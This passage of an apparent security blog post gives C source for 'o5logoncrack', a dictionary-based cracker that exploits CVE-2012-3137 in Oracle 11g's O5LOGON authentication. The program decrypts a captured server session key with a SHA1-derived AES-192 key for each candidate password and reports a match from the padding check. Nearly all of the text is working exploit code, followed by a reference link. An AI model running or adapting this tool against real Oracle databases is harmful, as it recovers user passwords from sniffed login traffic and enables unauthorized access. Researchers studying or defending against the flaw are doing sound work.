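        if (hexc > 9) hexc-=7;
        array[j]+=hexc;
        j++;
    }
    return j;
}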

static void hexdump( FILE *f, const char *title, const unsigned char *s,int l) {
    int n = 0;

    fprintf(f, "%s", title);
    for (; n < l; ++n) {
        if ((n % 16) == 0) {
            fprintf(f, "\n%04x", n);
        }
        fprintf(f, " %02x", s[n]);
    }

    fprintf(f, "\n");
}

void ORACLE_MixCase_Hash (char *passwd, int passwd_len, unsigned char salt[10], unsigned char* oracle_mixcase_hash) {
    unsigned char to_hash[256];
    SHA_CTX ctx;

    memcpy (to_hash, passwd, passwd_len);
    memcpy (to_hash+passwd_len, salt, 10);

    SHA1_Init (&ctx);
    SHA1_Update (&ctx, to_hash, passwd_len+10);
    SHA1_Final (oracle_mixcase_hash, &ctx);
}

void ORACLE_TNS_Decrypt_AES192_CBC (unsigned char aes_key_bytes[24], unsigned char* input, int input_len, unsigned char* output) {
    unsigned char iv[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

    AES_KEY key;
    AES_set_decrypt_key(aes_key_bytes, 192, &key);
    AES_cbc_encrypt(input, output, input_len, &key, iv, AES_DECRYPT);
}

void ORACLE_TNS_Encrypt_AES192_CBC (unsigned char aes_key_bytes[24], unsigned char* input, int input_len, unsigned char* output) {
    unsigned char iv[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

    AES_KEY key;
    AES_set_encrypt_key(aes_key_bytes, 192, &key);
    AES_cbc_encrypt(input, output, input_len, &key, iv, AES_ENCRYPT);
}

void usage() {
    fprintf(stdout, "o5logoncrack -k server sesskey -s salt -d dict\n");
    exit(0);
}

int main(int argc, char* argv[]) {

    char password [100];
    unsigned char aes_key_bytes[24] = {0};
    char dict_filename[256] = {0};
    unsigned char Oracle_MixCaseHash[20] = {0};
    unsigned char decrypted_server_sesskey[48] = {0};
    unsigned char AUTH_SESSKEY[48] = {0};
    unsigned char AUTH_VFR_DATA[10] = {0};
    int ret;
    int debug = 0;
    FILE * fp = NULL;

    int ch;
    int args = 0;
    while( ( ch = getopt( argc, argv, "k:s:d:v" ) ) != -1 ) {
        switch(ch) {

        case 'k':
            // 48 bytes = 96 hex digits; anything else would not fit AUTH_SESSKEY
            if (strlen(optarg) != 96) usage();
            HexStringtoBinArray(optarg, AUTH_SESSKEY);
            break;
        case 's':
            // 10 bytes = 20 hex digits; anything else would not fit AUTH_VFR_DATA
            if (strlen(optarg) != 20) usage();
            HexStringtoBinArray(optarg, AUTH_VFR_DATA);
            break;
        case 'd':
            strncpy(dict_filename, optarg, 255);
            break;
        case 'v':
            debug = 1;
            break;
        default:
            usage();
        }
        args++;
    }

    if (args < 3) usage();

    printf ("*************************************************************\n");
    printf ("Oracle 11g TNS AES-192 cracker by zz@nsfocus\n");
    printf ("*************************************************************\n\n");

    if ( (fp = fopen(dict_filename, "r")) == NULL ) {
        perror("fail to read");
        exit(1);
    }

    while(fgets(password, 100, fp) != NULL) {

        // Strip the line ending ("\n" or "\r\n"); a last line without one is left intact
        password[strcspn(password, "\r\n")] = '\0';

        if (debug)
            fprintf(stdout, "try `%s'\n", password);
        // Create Oracle Hash from the salt (AUTH_VFR_DATA) and the password
        ORACLE_MixCase_Hash (password, strlen (password), AUTH_VFR_DATA, Oracle_MixCaseHash);

        // AES-192 key: 20-byte hash followed by 4 zero bytes
        memset (aes_key_bytes,0,sizeof(aes_key_bytes));
        memcpy (aes_key_bytes,Oracle_MixCaseHash, 20);

        if (debug)
            hexdump(stdout, "aes_key_bytes", aes_key_bytes, sizeof(aes_key_bytes));

        memset (decrypted_server_sesskey, 0, sizeof(decrypted_server_sesskey));
        ORACLE_TNS_Decrypt_AES192_CBC (aes_key_bytes, AUTH_SESSKEY, 48, decrypted_server_sesskey);

        if (debug)
            hexdump(stdout, "decrypted_server_sesskey", decrypted_server_sesskey, sizeof(decrypted_server_sesskey));

        // The last 8 bytes of the 48-byte plaintext must be the 0x08 padding
        ret = memcmp(&decrypted_server_sesskey[40], "\x08\x08\x08\x08\x08\x08\x08\x08", 8);

        if (ret == 0) {
            printf ("\nFound password: %s \n\n", password);
            fclose(fp);
            return 0;
        }

        memset(password, 0, sizeof(password));

    }

    fclose(fp);
    return 0;
}

Reference links


Oracle Database Authentication Protocol Security Restriction Bypass Vulnerability (CVE-2012-3137)
http://usmacd.com/cn/cve-2012-3137/
Author
henices
Posted on
September 6, 2023